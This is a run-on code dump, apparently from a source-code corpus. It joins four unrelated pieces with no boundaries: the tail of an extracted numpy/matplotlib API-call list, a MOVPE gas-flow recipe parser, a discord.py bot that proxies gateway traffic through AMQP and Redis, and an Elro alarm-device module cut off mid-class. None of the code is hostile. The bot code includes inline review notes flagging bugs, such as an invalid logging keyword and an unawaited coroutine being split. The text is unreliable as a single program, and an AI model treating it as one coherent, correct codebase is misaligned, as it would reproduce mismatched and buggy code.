[MeV]'])\n", (44697, 44755), True, 'import pandas as pd\n'), ((45068, 45088), 'numpy.argmax', 'np.argmax', (['joint_pdf'], {}), '(joint_pdf)\n', (45077, 45088), True, 'import numpy as np\n'), ((45111, 45153), 'numpy.unravel_index', 'np.unravel_index', (['map_idx', 'joint_pdf.shape'], {}), '(map_idx, joint_pdf.shape)\n', (45127, 45153), True, 'import numpy as np\n'), 
((45424, 45460), 'pandas.concat', 'pd.concat', (['dfs_ls'], {'ignore_index': '(True)'}), '(dfs_ls, ignore_index=True)\n', (45433, 45460), True, 'import pandas as pd\n'), ((48679, 48712), 'numpy.argwhere', 'np.argwhere', (['(self.orders == order)'], {}), '(self.orders == order)\n', (48690, 48712), True, 'import numpy as np\n'), ((49835, 49863), 'numpy.argwhere', 'np.argwhere', (['(orders == order)'], {}), '(orders == order)\n', (49846, 49863), True, 'import numpy as np\n'), ((50805, 50829), 'numpy.atleast_1d', 'np.atleast_1d', (['ref2_vals'], {}), '(ref2_vals)\n', (50818, 50829), True, 'import numpy as np\n'), ((50854, 50878), 'numpy.atleast_1d', 'np.atleast_1d', (['ref3_vals'], {}), '(ref3_vals)\n', (50867, 50878), True, 'import numpy as np\n'), ((58300, 58328), 'numpy.sqrt', 'np.sqrt', (['model.cbar_sq_mean_'], {}), '(model.cbar_sq_mean_)\n', (58307, 58328), True, 'import numpy as np\n'), ((58751, 58783), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(3.4, 3.4)'}), '(figsize=(3.4, 3.4))\n', (58763, 58783), True, 'import matplotlib.pyplot as plt\n'), ((59141, 59181), 'gsum.ConjugateGaussianProcess', 'gm.ConjugateGaussianProcess', ([], {}), '(**gp_kwargs)\n', (59168, 59181), True, 'import gsum as gm\n'), ((59805, 59833), 'numpy.sqrt', 'np.sqrt', (['model.cbar_sq_mean_'], {}), '(model.cbar_sq_mean_)\n', (59812, 59833), True, 'import numpy as np\n'), ((62444, 62453), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (62451, 62453), True, 'import matplotlib.pyplot as plt\n'), ((63400, 63417), 'numpy.atleast_2d', 'np.atleast_2d', (['ax'], {}), '(ax)\n', (63413, 63417), True, 'import numpy as np\n'), ((69116, 69125), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (69123, 69125), True, 'import matplotlib.pyplot as plt\n'), ((69677, 69686), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (69684, 69686), True, 'import matplotlib.pyplot as plt\n'), ((71601, 71631), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(1, 3.2)'}), 
'(figsize=(1, 3.2))\n', (71613, 71631), True, 'import matplotlib.pyplot as plt\n'), ((71993, 72018), 'matplotlib.ticker.MaxNLocator', 'MaxNLocator', ([], {'integer': '(True)'}), '(integer=True)\n', (72004, 72018), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((72395, 72408), 'numpy.ceil', 'np.ceil', (['ymax'], {}), '(ymax)\n', (72402, 72408), True, 'import numpy as np\n'), ((72514, 72523), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (72521, 72523), True, 'import matplotlib.pyplot as plt\n'), ((73620, 73652), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(3.2, 3.2)'}), '(figsize=(3.2, 3.2))\n', (73632, 73652), True, 'import matplotlib.pyplot as plt\n'), ((74001, 74066), 'matplotlib.pyplot.rc_context', 'plt.rc_context', (["{'text.usetex': True, 'text.latex.preview': True}"], {}), "({'text.usetex': True, 'text.latex.preview': True})\n", (74015, 74066), True, 'import matplotlib.pyplot as plt\n'), ((74662, 74671), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (74669, 74671), True, 'import matplotlib.pyplot as plt\n'), ((75962, 76015), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(7, 3.2)', 'constrained_layout': '(True)'}), '(figsize=(7, 3.2), constrained_layout=True)\n', (75972, 76015), True, 'import matplotlib.pyplot as plt\n'), ((77673, 77705), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(3.2, 3.2)'}), '(figsize=(3.2, 3.2))\n', (77685, 77705), True, 'import matplotlib.pyplot as plt\n'), ((78854, 78864), 'numpy.diff', 'np.diff', (['y'], {}), '(y)\n', (78861, 78864), True, 'import numpy as np\n'), ((81821, 81830), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (81828, 81830), True, 'import matplotlib.pyplot as plt\n'), ((82338, 82380), 'numpy.argwhere', 'np.argwhere', (['(self.orders_original == order)'], {}), '(self.orders_original == order)\n', (82349, 82380), True, 'import numpy as np\n'), ((83052, 83064), 'numpy.diag', 'np.diag', (['cov'], {}), 
'(cov)\n', (83059, 83064), True, 'import numpy as np\n'), ((83470, 83484), 'numpy.mean', 'np.mean', (['x_min'], {}), '(x_min)\n', (83477, 83484), True, 'import numpy as np\n'), ((83493, 83506), 'numpy.std', 'np.std', (['x_min'], {}), '(x_min)\n', (83499, 83506), True, 'import numpy as np\n'), ((83528, 83542), 'numpy.mean', 'np.mean', (['y_min'], {}), '(y_min)\n', (83535, 83542), True, 'import numpy as np\n'), ((83551, 83564), 'numpy.std', 'np.std', (['y_min'], {}), '(y_min)\n', (83557, 83564), True, 'import numpy as np\n'), ((83659, 83679), 'numpy.cov', 'np.cov', (['x_min', 'y_min'], {}), '(x_min, y_min)\n', (83665, 83679), True, 'import numpy as np\n'), ((86343, 86352), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (86350, 86352), True, 'import matplotlib.pyplot as plt\n'), ((88756, 88790), 'numpy.zeros', 'np.zeros', (['(nx, ny, 1)'], {'dtype': 'float'}), '((nx, ny, 1), dtype=float)\n', (88764, 88790), True, 'import numpy as np\n'), ((11900, 11916), 'numpy.max', 'np.max', (['pdf_vals'], {}), '(pdf_vals)\n', (11906, 11916), True, 'import numpy as np\n'), ((22394, 22406), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (22402, 22406), True, 'import numpy as np\n'), ((32388, 32399), 'numpy.array', 'np.array', (['c'], {}), '(c)\n', (32396, 32399), True, 'import numpy as np\n'), ((34736, 34766), 'numpy.isin', 'np.isin', (['self.orders', 'excluded'], {}), '(self.orders, excluded)\n', (34743, 34766), True, 'import numpy as np\n'), ((35024, 35049), 'numpy.isin', 'np.isin', (['orders', 'excluded'], {}), '(orders, excluded)\n', (35031, 35049), True, 'import numpy as np\n'), ((56299, 56309), 'matplotlib.pyplot.draw', 'plt.draw', ([], {}), '()\n', (56307, 56309), True, 'import matplotlib.pyplot as plt\n'), ((59311, 59339), 'numpy.sqrt', 'np.sqrt', (['model.cbar_sq_mean_'], {}), '(model.cbar_sq_mean_)\n', (59318, 59339), True, 'import numpy as np\n'), ((59399, 59439), 'gsum.ConjugateGaussianProcess', 'gm.ConjugateGaussianProcess', ([], {}), '(**gp_kwargs)\n', 
(59426, 59439), True, 'import gsum as gm\n'), ((62663, 62696), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (62675, 62696), False, 'from os import path\n'), ((63184, 63248), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '(3.4, 3.4)', 'sharex': '(True)', 'sharey': '(True)'}), '(2, 2, figsize=(3.4, 3.4), sharex=True, sharey=True)\n', (63196, 63248), True, 'import matplotlib.pyplot as plt\n'), ((63293, 63325), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(3.4, 3.4)'}), '(figsize=(3.4, 3.4))\n', (63305, 63325), True, 'import matplotlib.pyplot as plt\n'), ((63349, 63366), 'numpy.atleast_2d', 'np.atleast_2d', (['ax'], {}), '(ax)\n', (63362, 63366), True, 'import numpy as np\n'), ((68059, 68079), 'matplotlib.ticker.MultipleLocator', 'MultipleLocator', (['(0.2)'], {}), '(0.2)\n', (68074, 68079), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((69902, 69935), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (69914, 69935), False, 'from os import path\n'), ((70716, 70749), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (70728, 70749), False, 'from os import path\n'), ((72744, 72777), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (72756, 72777), False, 'from os import path\n'), ((77319, 77352), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (77331, 77352), False, 'from os import path\n'), ((83911, 83941), 'numpy.column_stack', 'np.column_stack', (['(x_all, pred)'], {}), '((x_all, pred))\n', (83926, 83941), True, 'import numpy as np\n'), ((83955, 83996), 'numpy.column_stack', 'np.column_stack', (['(x_all, pred + 2 * stdv)'], {}), '((x_all, pred + 2 * stdv))\n', (83970, 83996), True, 'import numpy as np\n'), ((84010, 84051), 'numpy.column_stack', 
'np.column_stack', (['(x_all, pred - 2 * stdv)'], {}), '((x_all, pred - 2 * stdv))\n', (84025, 84051), True, 'import numpy as np\n'), ((86709, 86751), 'numpy.argwhere', 'np.argwhere', (['(self.orders_original == order)'], {}), '(self.orders_original == order)\n', (86720, 86751), True, 'import numpy as np\n'), ((6419, 6465), 'joblib.Parallel', 'Parallel', ([], {'n_jobs': 'num_cores', 'prefer': '"""processes"""'}), "(n_jobs=num_cores, prefer='processes')\n", (6427, 6465), False, 'from joblib import Parallel, delayed\n'), ((22883, 22902), 'numpy.around', 'np.around', (['fweights'], {}), '(fweights)\n', (22892, 22902), True, 'import numpy as np\n'), ((43895, 43931), 'numpy.array', 'np.array', (['[breakdown, breakdown_pdf]'], {}), '([breakdown, breakdown_pdf])\n', (43903, 43931), True, 'import numpy as np\n'), ((51343, 51363), 'numpy.eye', 'np.eye', (['cov.shape[0]'], {}), '(cov.shape[0])\n', (51349, 51363), True, 'import numpy as np\n'), ((55321, 55341), 'matplotlib.ticker.MultipleLocator', 'MultipleLocator', (['(0.1)'], {}), '(0.1)\n', (55336, 55341), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((55386, 55405), 'matplotlib.ticker.AutoMinorLocator', 'AutoMinorLocator', (['(2)'], {}), '(2)\n', (55402, 55405), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((56196, 56217), 'matplotlib.ticker.MultipleLocator', 'MultipleLocator', (['(0.02)'], {}), '(0.02)\n', (56211, 56217), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((56262, 56281), 'matplotlib.ticker.AutoMinorLocator', 'AutoMinorLocator', (['(2)'], {}), '(2)\n', (56278, 56281), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((57612, 57622), 'numpy.ones', 'np.ones', (['(2)'], {}), '(2)\n', (57619, 57622), True, 'import numpy as np\n'), ((68757, 68776), 'matplotlib.ticker.AutoMinorLocator', 'AutoMinorLocator', (['(2)'], {}), '(2)\n', (68773, 
68776), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((68821, 68840), 'matplotlib.ticker.AutoMinorLocator', 'AutoMinorLocator', (['(2)'], {}), '(2)\n', (68837, 68840), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((72374, 72388), 'numpy.floor', 'np.floor', (['ymin'], {}), '(ymin)\n', (72382, 72388), True, 'import numpy as np\n'), ((75010, 75043), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (75022, 75043), False, 'from os import path\n'), ((79218, 79238), 'numpy.zeros', 'np.zeros', (['X.shape[0]'], {}), '(X.shape[0])\n', (79226, 79238), True, 'import numpy as np\n'), ((83601, 83615), 'numpy.mean', 'np.mean', (['x_min'], {}), '(x_min)\n', (83608, 83615), True, 'import numpy as np\n'), ((83617, 83631), 'numpy.mean', 'np.mean', (['y_min'], {}), '(y_min)\n', (83624, 83631), True, 'import numpy as np\n'), ((88462, 88473), 'numpy.ones', 'np.ones', (['ix'], {}), '(ix)\n', (88469, 88473), True, 'import numpy as np\n'), ((88487, 88498), 'numpy.ones', 'np.ones', (['ix'], {}), '(ix)\n', (88494, 88498), True, 'import numpy as np\n'), ((88546, 88557), 'numpy.ones', 'np.ones', (['iy'], {}), '(iy)\n', (88553, 88557), True, 'import numpy as np\n'), ((88571, 88582), 'numpy.ones', 'np.ones', (['iy'], {}), '(iy)\n', (88578, 88582), True, 'import numpy as np\n'), ((7730, 7751), 'numpy.exp', 'np.exp', (['(-0.5 * r ** 2)'], {}), '(-0.5 * r ** 2)\n', (7736, 7751), True, 'import numpy as np\n'), ((44308, 44330), 'numpy.array', 'np.array', (['[ls, ls_pdf]'], {}), '([ls, ls_pdf])\n', (44316, 44330), True, 'import numpy as np\n'), ((66611, 66643), 'numpy.sqrt', 'np.sqrt', (['(std ** 2 + std_3bf ** 2)'], {}), '(std ** 2 + std_3bf ** 2)\n', (66618, 66643), True, 'import numpy as np\n'), ((68601, 68621), 'matplotlib.ticker.MultipleLocator', 'MultipleLocator', (['(0.1)'], {}), '(0.1)\n', (68616, 68621), False, 'from matplotlib.ticker import MultipleLocator, 
AutoMinorLocator, MaxNLocator\n'), ((68692, 68712), 'matplotlib.ticker.MultipleLocator', 'MultipleLocator', (['(0.2)'], {}), '(0.2)\n', (68707, 68712), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((6479, 6517), 'joblib.delayed', 'delayed', (['model.log_marginal_likelihood'], {}), '(model.log_marginal_likelihood)\n', (6486, 6517), False, 'from joblib import Parallel, delayed\n'), ((7757, 7778), 'numpy.arange', 'np.arange', (['(9)', '(0)', '(-0.5)'], {}), '(9, 0, -0.5)\n', (7766, 7778), True, 'import numpy as np\n'), ((6525, 6536), 'numpy.log', 'np.log', (['ls_'], {}), '(ls_)\n', (6531, 6536), True, 'import numpy as np\n')] |
#!/usr/bin/python3
#-*- coding: utf-8 -*-
"""
A simplistic attempt to parse simple procedural languages that control e.g. MOVPE apparatuses gas flow (not finished)
"""
import sys,re
time = 0
labels = {}       # maps a label line ("name {") to the line number it starts at
variables = {}    # last value assigned to each recipe variable
                  # (fix: was referenced below but never defined -> NameError on any "X to Y" command)
tableheader = [] ## TODO TODO efficient accumulation of data w/ possibility of new variables in the middle of EPI recipe
tablevalues = []
tabletiming = []
with open(sys.argv[1], encoding='latin1') as epifile:
    lines = epifile.readlines()
    for n, line in enumerate(lines):
        #line = '1:020 " Setup: lateral growth", NH3_2.run close, TMGa_1.run close, N2.line close, N2.run open,'
        ## Detect and remember labels
        if len(line.strip())>=1 and line.strip()[-1] == '{':
            labels[line.strip()] = n
            continue
        ## Split the line into its time stamp, quoted name and command list
        timematch = re.match('^\\s*\\d?\\d?:?\\d+', line)
        timedelim = timematch.end() if timematch else 0
        namematch = re.search('"[^"]*"', line)
        namedelim = namematch.end() if namematch else timedelim
        cmntmatch = re.search('#', line)
        cmntdelim = cmntmatch.end()-1 if cmntmatch else 1000000
        timestr, namestr, cmdsstr = line[:timedelim].strip(), line[timedelim:namedelim].strip(), line[namedelim:cmntdelim].strip()
        print("DEBUG: timestr, = ", timestr,)
        print("DEBUG: namestr, = ", namestr,)
        print("DEBUG: cmdsstr = ", cmdsstr)
        for cmd in [c.strip().strip(';') for c in cmdsstr.split(',') if c.strip()!='']:
            print(time, " DEBUG: cmd = ", cmd)
            if ' to ' in cmd:
                variable, value = [c.strip() for c in cmd.split(' to ', 1)]
                variables[variable] = value  # fix: store the assignment (was a bare lookup that raised NameError)
            ## TODO if cmd == "GOTO OR WHATEVER": n = labels[JUMPTO]; continue
        ## Advance the time
        if timematch:
            if ':' in timestr: time += 60*int(timestr.split(':')[0]) + int(timestr.split(':')[1])
            else: time += int(timestr);
| [
"re.match",
"re.search"
] | [((798, 835), 're.match', 're.match', (['"""^\\\\s*\\\\d?\\\\d?:?\\\\d+"""', 'line'], {}), "('^\\\\s*\\\\d?\\\\d?:?\\\\d+', line)\n", (806, 835), False, 'import sys, re\n'), ((925, 951), 're.search', 're.search', (['""""[^"]*\\""""', 'line'], {}), '(\'"[^"]*"\', line)\n', (934, 951), False, 'import sys, re\n'), ((1048, 1068), 're.search', 're.search', (['"""#"""', 'line'], {}), "('#', line)\n", (1057, 1068), False, 'import sys, re\n')] |
import aio_pika
import asyncio
import config
import inspect
import logging
import orjson
import sys
import traceback
import zangy
from classes.misc import Status, Session
from classes.state import State
from discord import utils
from discord.ext import commands
from discord.ext.commands import DefaultHelpCommand, Context
from discord.ext.commands.core import _CaseInsensitiveDict
from discord.ext.commands.view import StringView
from discord.gateway import DiscordWebSocket
from discord.http import HTTPClient
from discord.utils import parse_time, to_json
log = logging.getLogger(__name__)
class Bot(commands.AutoShardedBot):
    """A discord.py AutoShardedBot variant whose gateway traffic is proxied
    through AMQP queues and whose state lives in Redis (via a custom State).
    The constructor deliberately re-implements BotBase.__init__ so no real
    websocket connection is created."""
    # NOTE(review): DefaultHelpCommand() as a default argument is a shared
    # mutable default — every Bot() without an explicit help_command shares
    # the same instance. Confirm this is intentional.
    def __init__(self, command_prefix, help_command=DefaultHelpCommand(), description=None, **kwargs):
        self.command_prefix = command_prefix
        self.extra_events = {}
        # Name-mangled attributes of commands.BotBase, set up manually here.
        self._BotBase__cogs = {}
        self._BotBase__extensions = {}
        self._checks = []
        self._check_once = []
        self._before_invoke = None
        self._after_invoke = None
        self._help_command = None
        self.description = inspect.cleandoc(description) if description else ""
        self.owner_id = kwargs.get("owner_id")
        self.owner_ids = kwargs.get("owner_ids", set())
        self._skip_check = lambda x, y: x == y
        self.help_command = help_command
        self.case_insensitive = kwargs.get("case_insensitive", False)
        self.all_commands = _CaseInsensitiveDict() if self.case_insensitive else {}
        self.ws = None
        self.loop = asyncio.get_event_loop()
        self.http = HTTPClient(None, loop=self.loop)
        self._handlers = {"ready": self._handle_ready}
        self._hooks = {}
        self._listeners = {}
        self._connection = None
        self._closed = False
        self._ready = asyncio.Event()
        # External services; populated in start().
        self._redis = None
        self._amqp = None
        self._amqp_channel = None
        self._amqp_queue = None
    @property
    def config(self):
        """The imported config module (token, redis_url, amqp_url, cogs, ...)."""
        return config
    # The following accessors shadow discord.py properties with coroutines
    # because all state is fetched asynchronously from Redis.
    async def user(self):
        return await self._connection.user()
    async def users(self):
        return await self._connection._users()
    async def guilds(self):
        return await self._connection.guilds()
    async def emojis(self):
        return await self._connection.emojis()
    async def cached_messages(self):
        return await self._connection._messages()
    async def private_channels(self):
        return await self._connection.private_channels()
    async def shard_count(self):
        # Shard count is decided by the external gateway process.
        return int(await self._redis.get("gateway_shards"))
    async def started(self):
        # NOTE(review): .split() is applied to the coroutine returned by
        # _get() before awaiting — presumably this should await first; verify.
        return parse_time(str(await self._connection._get("gateway_started").split(".")[0]))
    async def statuses(self):
        return [Status(x) for x in await self._connection._get("gateway_statuses")]
    async def sessions(self):
        return {int(x): Session(y) for x, y in (await self._connection._get("gateway_sessions")).items()}
    async def get_channel(self, channel_id):
        return await self._connection.get_channel(channel_id)
    async def get_guild(self, guild_id):
        return await self._connection._get_guild(guild_id)
    async def get_user(self, user_id):
        return await self._connection.get_user(user_id)
    async def get_emoji(self, emoji_id):
        return await self._connection.get_emoji(emoji_id)
    async def get_all_channels(self):
        """Async generator over every channel of every guild."""
        for guild in await self.guilds():
            for channel in await guild.channels():
                yield channel
    async def get_all_members(self):
        """Async generator over every member of every guild."""
        for guild in await self.guilds():
            for member in await guild.members():
                yield member
    async def _get_state(self, **options):
        """Build the Redis-backed State object used instead of discord.py's
        ConnectionState."""
        return State(
            dispatch=self.dispatch,
            handlers=self._handlers,
            hooks=self._hooks,
            http=self.http,
            loop=self.loop,
            redis=self._redis,
            shard_count=await self.shard_count(),
            **options,
        )
    async def get_context(self, message, *, cls=Context):
        """Async re-implementation of BotBase.get_context: message.author()
        and self.user() are coroutines here, hence the override."""
        view = StringView(message.content)
        ctx = cls(prefix=None, view=view, bot=self, message=message)
        if self._skip_check((await message.author()).id, (await self.user()).id):
            return ctx
        prefix = await self.get_prefix(message)
        invoked_prefix = prefix
        if isinstance(prefix, str):
            if not view.skip_string(prefix):
                return ctx
        else:
            try:
                if message.content.startswith(tuple(prefix)):
                    invoked_prefix = utils.find(view.skip_string, prefix)
                else:
                    return ctx
            except TypeError:
                if not isinstance(prefix, list):
                    raise TypeError("get_prefix must return either a string or a list of string, "
                                    "not {}".format(prefix.__class__.__name__))
                for value in prefix:
                    if not isinstance(value, str):
                        raise TypeError("Iterable command_prefix or list returned from get_prefix must "
                                        "contain only strings, not {}".format(value.__class__.__name__))
                raise
        invoker = view.get_word()
        ctx.invoked_with = invoker
        ctx.prefix = invoked_prefix
        ctx.command = self.all_commands.get(invoker)
        return ctx
    async def process_commands(self, message):
        """Ignore bot authors, then resolve and invoke the command."""
        if (await message.author()).bot:
            return
        ctx = await self.get_context(message)
        await self.invoke(ctx)
    async def receive_message(self, msg):
        """Handle one raw gateway payload received from the AMQP queue.
        Mirrors DiscordWebSocket.received_message, but the payload arrives
        pre-framed as JSON bytes and may carry an extra 'old' entry."""
        self.ws._dispatch("socket_raw_receive", msg)
        msg = orjson.loads(msg)
        self.ws._dispatch("socket_response", msg)
        op = msg.get("op")
        data = msg.get("d")
        event = msg.get("t")
        old = msg.get("old")
        # Only DISPATCH frames carry events; heartbeats etc. are handled upstream.
        if op != self.ws.DISPATCH:
            return
        try:
            func = self.ws._discord_parsers[event]
        except KeyError:
            log.debug("Unknown event %s.", event)
        else:
            try:
                await func(data, old)
            except asyncio.CancelledError:
                pass
            except Exception:
                try:
                    await self.on_error(event)
                except asyncio.CancelledError:
                    pass
        # Resolve wait_for()-style listeners registered for this event.
        removed = []
        for index, entry in enumerate(self.ws._dispatch_listeners):
            if entry.event != event:
                continue
            future = entry.future
            if future.cancelled():
                removed.append(index)
                continue
            try:
                valid = entry.predicate(data)
            except Exception as exc:
                future.set_exception(exc)
                removed.append(index)
            else:
                if valid:
                    ret = data if entry.result is None else entry.result(data)
                    future.set_result(ret)
                    removed.append(index)
        # Delete in reverse so earlier indices stay valid.
        for index in reversed(removed):
            del self.ws._dispatch_listeners[index]
    async def send_message(self, msg):
        """Publish a payload to the gateway process via AMQP instead of a socket."""
        data = to_json(msg)
        self.ws._dispatch("socket_raw_send", data)
        await self._amqp_channel.default_exchange.publish(aio_pika.Message(body=data), routing_key="gateway.send")
    async def start(self):
        """Connect Redis/AMQP, wire up a socketless DiscordWebSocket, load the
        configured cogs and then consume gateway events forever."""
        log.info("Starting...")
        self._redis = await zangy.create_pool(self.config.redis_url, 5)
        self._amqp = await aio_pika.connect_robust(self.config.amqp_url)
        self._amqp_channel = await self._amqp.channel()
        self._amqp_queue = await self._amqp_channel.get_queue("gateway.recv")
        self._connection = await self._get_state()
        self._connection._get_client = lambda: self
        # The websocket object is only used as a parser/dispatch container;
        # it never owns a real socket (socket=None).
        self.ws = DiscordWebSocket(socket=None, loop=self.loop)
        self.ws.token = self.http.token
        self.ws._connection = self._connection
        self.ws._discord_parsers = self._connection.parsers
        self.ws._dispatch = self.dispatch
        self.ws.call_hooks = self._connection.call_hooks
        await self.http.static_login(self.config.token, bot=True)
        for extension in self.config.cogs:
            try:
                self.load_extension("cogs." + extension)
            except Exception:
                # NOTE(review): logging.Logger.error() accepts no 'file' kwarg —
                # this line raises TypeError when reached; drop file=sys.stderr.
                log.error(f"Failed to load extension {extension}.", file=sys.stderr)
                # NOTE(review): traceback.print_exc() returns None, so this logs
                # "None"; use log.exception(...) or traceback.format_exc() instead.
                log.error(traceback.print_exc())
        # Main consume loop: every queued gateway payload is processed and acked.
        async with self._amqp_queue.iterator() as queue_iter:
            async for message in queue_iter:
                async with message.process(ignore_processed=True):
                    await self.receive_message(message.body)
                    message.ack()
| [
"logging.getLogger",
"discord.ext.commands.view.StringView",
"aio_pika.connect_robust",
"discord.utils.to_json",
"discord.ext.commands.DefaultHelpCommand",
"classes.misc.Status",
"discord.utils.find",
"discord.gateway.DiscordWebSocket",
"discord.http.HTTPClient",
"asyncio.Event",
"inspect.cleand... | [((566, 593), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (583, 593), False, 'import logging\n'), ((684, 704), 'discord.ext.commands.DefaultHelpCommand', 'DefaultHelpCommand', ([], {}), '()\n', (702, 704), False, 'from discord.ext.commands import DefaultHelpCommand, Context\n'), ((1511, 1535), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (1533, 1535), False, 'import asyncio\n'), ((1556, 1588), 'discord.http.HTTPClient', 'HTTPClient', (['None'], {'loop': 'self.loop'}), '(None, loop=self.loop)\n', (1566, 1588), False, 'from discord.http import HTTPClient\n'), ((1783, 1798), 'asyncio.Event', 'asyncio.Event', ([], {}), '()\n', (1796, 1798), False, 'import asyncio\n'), ((4069, 4096), 'discord.ext.commands.view.StringView', 'StringView', (['message.content'], {}), '(message.content)\n', (4079, 4096), False, 'from discord.ext.commands.view import StringView\n'), ((5738, 5755), 'orjson.loads', 'orjson.loads', (['msg'], {}), '(msg)\n', (5750, 5755), False, 'import orjson\n'), ((7240, 7252), 'discord.utils.to_json', 'to_json', (['msg'], {}), '(msg)\n', (7247, 7252), False, 'from discord.utils import parse_time, to_json\n'), ((7882, 7927), 'discord.gateway.DiscordWebSocket', 'DiscordWebSocket', ([], {'socket': 'None', 'loop': 'self.loop'}), '(socket=None, loop=self.loop)\n', (7898, 7927), False, 'from discord.gateway import DiscordWebSocket\n'), ((1069, 1098), 'inspect.cleandoc', 'inspect.cleandoc', (['description'], {}), '(description)\n', (1085, 1098), False, 'import inspect\n'), ((1411, 1433), 'discord.ext.commands.core._CaseInsensitiveDict', '_CaseInsensitiveDict', ([], {}), '()\n', (1431, 1433), False, 'from discord.ext.commands.core import _CaseInsensitiveDict\n'), ((2725, 2734), 'classes.misc.Status', 'Status', (['x'], {}), '(x)\n', (2731, 2734), False, 'from classes.misc import Status, Session\n'), ((2848, 2858), 'classes.misc.Session', 'Session', (['y'], {}), '(y)\n', (2855, 2858), False, 
'from classes.misc import Status, Session\n'), ((7508, 7551), 'zangy.create_pool', 'zangy.create_pool', (['self.config.redis_url', '(5)'], {}), '(self.config.redis_url, 5)\n', (7525, 7551), False, 'import zangy\n'), ((7579, 7624), 'aio_pika.connect_robust', 'aio_pika.connect_robust', (['self.config.amqp_url'], {}), '(self.config.amqp_url)\n', (7602, 7624), False, 'import aio_pika\n'), ((7362, 7389), 'aio_pika.Message', 'aio_pika.Message', ([], {'body': 'data'}), '(body=data)\n', (7378, 7389), False, 'import aio_pika\n'), ((4592, 4628), 'discord.utils.find', 'utils.find', (['view.skip_string', 'prefix'], {}), '(view.skip_string, prefix)\n', (4602, 4628), False, 'from discord import utils\n'), ((8500, 8521), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (8519, 8521), False, 'import traceback\n')] |
from enum import Enum
from abc import ABC, abstractmethod
import logging
import json
import trio
class DeviceType(Enum):
    """
    The DeviceType defines which kind of Elro device this is
    """
    # Values are the 4-character hex device-type codes reported in the
    # "device_name" field of the connector payload.
    CO_ALARM = "0000"
    WATER_ALARM = "0004"
    HEAT_ALARM = "0003"
    FIRE_ALARM = "0005"
    DOOR_WINDOW_SENSOR = "0101"
class Device(ABC):
    """
    A Device is an Elro device that is connected to the system
    """
    def __init__(self, device_id, device_type):
        """
        Constructor
        :param device_id: The device ID
        :param device_type: The device type
        """
        self.id = device_id
        self._name = ""
        self._battery_level = -1  # -1 means "not yet reported"
        self._device_state = ""
        self.device_type = device_type
        # trio events that consumers can await; each is replaced by a fresh
        # Event after it fires (trio events cannot be reset).
        self.updated = trio.Event()
        self.alarm = trio.Event()
    @property
    def name(self):
        """
        The name of the device
        :return: The name
        """
        return self._name
    @name.setter
    def name(self, name):
        self._name = name
        self._send_update_event()
    @property
    def device_state(self):
        """
        The current state of the device as a string
        :return: The device state
        """
        return self._device_state
    @device_state.setter
    def device_state(self, device_state):
        self._device_state = device_state
        self._send_update_event()
    @property
    def battery_level(self):
        """
        The current battery level of the device in percent.
        :return: The battery level
        """
        return self._battery_level
    @battery_level.setter
    def battery_level(self, battery_level):
        self._battery_level = battery_level
        self._send_update_event()
    def _send_update_event(self):
        """
        Triggers the self.updated event
        """
        # Fire the current event, then install a new one so future updates
        # can be awaited again.
        self.updated.set()
        self.updated = trio.Event()
    def send_alarm_event(self):
        """
        Triggers the self.alarm event.
        """
        self.alarm.set()
        self.alarm = trio.Event()
    def update(self, data):
        """
        Updates this device with the data received from the actual device
        :param data: The data dict received from the actual device
        """
        # "device_name" actually carries the hex type code (see DeviceType).
        self.device_type = data["data"]["device_name"]
        # set battery status (hex byte 2..3 of the status string)
        batt = int(data["data"]["device_status"][2:4], 16)
        self.battery_level = batt
        self.device_state = "Unknown"
        self.update_specifics(data)
        self._send_update_event()
    @abstractmethod
    def update_specifics(self, data):
        """
        An abstract method that is called to update type specific things.
        :param data: The data dict received from the actual device
        """
        pass
    def __str__(self):
        return f"<{self.device_type}: {self.name} (id: {self.id})>"
    def __repr__(self):
        return str(self)
    @property
    def json(self):
        """
        A json representation of the device.
        :return: A str containing json.
        """
        return json.dumps({"name": self.name,
                           "id": self.id,
                           "type": self.device_type,
                           "state": self.device_state,
                           "battery": self.battery_level})
class WindowSensor(Device):
    """
    A sensor that can detect open/close state of a window.
    """
    def __init__(self, device_id):
        """
        Constructor
